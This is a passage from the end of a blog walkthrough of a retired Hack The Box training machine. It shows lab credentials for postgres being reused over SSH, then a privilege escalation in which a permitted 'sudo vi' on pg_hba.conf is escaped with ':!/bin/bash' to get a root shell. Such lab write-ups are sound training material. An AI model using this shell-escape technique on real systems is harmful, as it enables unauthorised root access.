srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-117.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-117.png 881w" layout="responsive"></amp-img></figure><p>No we have new credentials, let's check them trough SSH.</p><ul><li><code>postgres :P@s5w0rd!</code></li></ul><p>I don't know why it hasn't got any user flag. Then I checked statistics on this box and it showed me this.👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-118.png" class="kg-image" alt width="1174" height="527" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-118.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-118.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-118.png 1174w" layout="responsive"></amp-img></figure><p>This means we have no any user.txt in this box. Let's find root.txt.</p><hr></hr><h3 id="03-privilege-escalation-%E2%80%A6"><strong>03. Privilege Escalation …</strong></h3><p>First thing first! Let's check what are the commands that we can run as super user permission.</p><pre><code class="language-bash">sudo -l</code></pre><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-119.png" class="kg-image" alt width="1000" height="412" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-119.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-119.png 1000w" layout="responsive"></amp-img></figure><p>Looks like we can run the command “<code>/bin/vi /etc/postgresql/11/main/pg_hba.conf</code>” as <code>sudo</code>, So by running it and adding “<code>:!/bin/bash</code>” inside the vi editor, we got ourselves a root shell.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-120.png" class="kg-image" alt width="616" height="547" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-120.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-120.png 616w" layout="responsive"></amp-img></figure><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-121.png" class="kg-image" alt width="503" height="106" layout="responsive"></amp-img></figure><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-122.png" class="kg-image" alt width="875" height="775" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-122.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-122.png 875w" layout="responsive"></amp-img></figure><p>I’ll see you on the next retired machine! <strong><a href="https://h4rithd.com/blog/starting-point-htb-shield-walkthrough/index.html">Shield</a></strong> 🙋‍♂️🙋‍♂️</p><p><strong>Find me on </strong><a href="https://twitter.com/ShapManasick" rel="noopener noreferrer">@twitter</a><br /></p>

            </section>

        </article>
    </main>
    <footer class="page-footer">
            <amp-img class="site-icon" src="https://h4rithd.com/blog/content/images/2021/06/favicon.ico" width="50" height="50" layout="fixed"></amp-img>
        <h3>h4rithd.com</h3>
            <p>Penetration Tester | Ethical Hacker | Security Researcher</p>
        <p><a href="../../index.html">Read more posts →</a></p>
        <a class="powered" href="https://ghost.org" target="_blank" rel="noopener"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 156 156"><g fill="none" fill-rule="evenodd"><rect fill="#15212B" width="156" height="156" rx="27"/><g transform="translate(36 36)" fill="#F6F8FA"><path d="M0 71.007A4.004 4.004 0 014 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0130 84H4a4 4 0 01-4-4.007v-8.986zM50 71.007A4.004 4.004 0 0154 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0180 84H54a4 4 0 01-4-4.007v-8.986z"/><rect y="34" width="84" height="17" rx="4"/><path d="M0 4.007A4.007 4.007 0 014.007 0h41.986A4.003 4.003 0 0150 4.007v8.986A4.007 4.007 0 0145.993 17H4.007A4.003 4.003 0 010 12.993V4.007z"/><rect x="67" width="17" height="17" rx="4"/></g></g></svg> Published with Ghost</a>
    </footer>
    
</body>
</html>
